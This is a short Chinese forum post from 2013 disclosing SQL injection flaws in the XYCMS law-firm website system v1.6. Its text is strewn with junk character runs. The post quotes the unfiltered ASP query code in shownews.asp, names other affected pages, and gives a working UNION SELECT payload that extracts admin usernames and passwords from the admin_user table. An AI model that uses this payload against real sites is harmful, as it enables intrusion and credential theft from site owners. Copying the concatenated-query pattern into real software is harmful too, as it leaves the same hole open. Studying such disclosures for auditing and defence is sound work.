前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似& S1 T- T: H) D- \% z
7 ?; [2 R, h' }3 d
淫荡分割线
2 d( k. [8 Y" B6 B- j4 E--------------------------------------------------------
: s0 N" a! ^" J3 c% M$ A& D+ l $ M! F* a( W/ _' W+ I- o d
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
& p, Z$ R4 e: s' y5 @) G, _! c源码地址:http://down.chinaz.com/soft/29233.htm" B0 [0 J" X m+ b$ z* P
0 F2 V9 T; g: Q* t" s( v4 Y漏洞文件:shownews.asp' c7 p$ _9 \! S; }( t
漏洞代码:7-13行: Y) \ B6 ^. X0 b
! @4 R! g- M, N6 E7 F4 S; h/ Y- b! P
# h$ N- G) f7 K' R2 y# _<% : x, H/ H; ]: l# @' t* L
id=request.QueryString("id")
2 j4 Q: H. R( G; f9 a# n7 M
2 W8 d/ h3 e6 v- ? ~set snews=server.createobject("adodb.recordset")
" g2 U+ N# ]* o' l; nexec="select * from [news] where id="&id- a9 X& _/ D: \
snews.open exec,conn,1,1. z3 c# l) `# Y& @* \; M" H
%>
* v6 v4 x% g1 |! D" {! M
+ c7 N, p( E) ` ; i/ M& U: Z. B2 W& R( x" w( M$ y
什么过滤都没有 直造成注入: B7 b; | s4 H8 y: m; H! X
$ @) a3 l* V' z, K* e0 N. ]7 r8 Z注入点:http://127.0.0.1:99/shownews.asp?id=xx
6 I( \( O. V9 ]- N* T) v) [' |
% r4 @4 l; A. o) v3 D其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找6 W# Q7 _$ Q. M
# k0 [& E/ T" h+ u# y
" a8 s0 ^5 w' T2 W2 w3 x$ F/ Vexp: union select 1,admin,password,4,5,7 from admin_user- I& ^7 N4 |; W! P9 \$ a7 U) n2 B
8 B& P: O) s2 z, ~! K |
发表于 2013-4-4 17:28:12
收藏
支持
反对